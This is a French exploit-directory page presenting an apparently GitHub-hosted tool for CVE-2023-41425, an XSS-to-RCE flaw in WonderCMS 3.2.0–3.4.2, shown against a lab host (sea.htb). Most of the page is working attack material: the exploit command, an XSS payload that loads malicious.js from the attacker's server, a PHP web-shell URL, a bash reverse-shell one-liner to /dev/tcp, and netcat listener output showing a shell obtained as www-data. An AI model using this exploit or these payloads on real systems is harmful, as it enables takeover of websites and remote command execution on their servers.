Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-41425 — WonderCMS v3.2.0 - v3.4.2 exploit XSS vers RCE | Kitploit
Outils/GitHubGitHub/xpltive/cve-2023-41425
Génération de PayloadsAnalyse des VulnérabilitésExploitationShellcodeExploitation d'Applications WebTests d'Intrusion
GitHubxpltive/cve-2023-41425

CVE-2023-41425

WonderCMS v3.2.0 - v3.4.2 exploit XSS vers RCE

Voir le dépôt
17il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-41425

CVE-2023-41425 est une vulnérabilité XSS reflétée dans Wonder CMS qui permet en outre d'exécuter du code arbitraire via un script malveillant via le composant installModule.

Utilisation

Exécution de l'exploit contre le loginURL de la cible, en spécifiant notre IP et port pour le serveur web hébergeant le fichier .js malveillant :

$ python3 exploit.py --url http://sea.htb/loginURL --xip 10.10.16.25 --xport 8888
[+] Creating PHP Web Shell
[+] Writing malicious.js
[+] XSS Payload:
http://sea.htb/index.php?page=loginURL?"></form><script+src="http://10.10.16.25:8888/malicious.js"></script><form+action="
[+] Web Shell can be accessed once .zip file has been requested:
http://sea.htb/themes/malicious/malicious.php?cmd=<COMMAND>
[+] To get a reverse shell connection run the following:
[+] curl -s 'http://sea.htb/themes/malicious/malicious.php' --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'" 
[+] Starting HTTP server
Serving HTTP on 10.10.16.25 port 8888 (http://10.10.16.25:8888/) ...
<--REDACTED-->  "GET /malicious.js HTTP/1.1" 200 -
<--REDACTED-->  "GET /malicious.zip HTTP/1.1" 200 -
<--REDACTED-->  "GET /malicious.zip HTTP/1.1" 200 -
<--REDACTED-->  "GET /malicious.zip HTTP/1.1" 200 -
<--REDACTED-->  "GET /malicious.zip HTTP/1.1" 200 -

Envoyer la charge utile XSS à la victime. Une fois que la victime ouvre le lien, le .js sera demandé par elle au serveur web démarré ci-dessus. Le .js téléchargera ensuite le module .zip malveillant contenant un simple shell web PHP.

Une fois le .zip demandé, il devrait avoir été installé via installModule et peut être accédé via le lien fourni par le script.

Exécution de commandes

$ curl -s 'http://sea.htb/themes/malicious/malicious.php?cmd=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Shell inverse

Configurer d'abord le listener, puis exécuter une commande pour établir une connexion shell inverse. Le script fournit un exemple pour le faire (Linux).

$ curl -s 'http://sea.htb/themes/malicious/malicious.php' --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/10.10.16.25/7777 0>&1'"

Et obtenir la connexion sur le listener :

$ rlwrap -cAr nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.16.25] from (UNKNOWN) [10.129.194.205] 54398
bash: cannot set terminal process group (1135): Inappropriate ioctl for device
bash: no job control in this shell
www-data@sea:/var/www/sea/themes/malicious$

Installation

Installer les dépendances :

pip install -r requirements.txt

Aide :

$ python3 exploit.py --help

usage: exploit.py [-h] --url URL --xip XIP --xport XPORT

Exploit Wonder CMS v3.2.0 - v3.4.2 XSS to RCE (CVE-2023-41425)
Initial CVE and proof-of-concept by prodigiousMind
Rewritten by xpltive

options:
  -h, --help     show this help message and exit
  --url URL      Target URL of loginURL (Example: http://sea.htb/loginURL)
  --xip XIP      IP for HTTP web server that hosts the malicious .js file
  --xport XPORT  Port for HTTP web server that hosts the malicious .js file

Crédits

Crédits à prodigiousMind pour avoir découvert et signalé la vulnérabilité (Lien).

Télécharger l’outil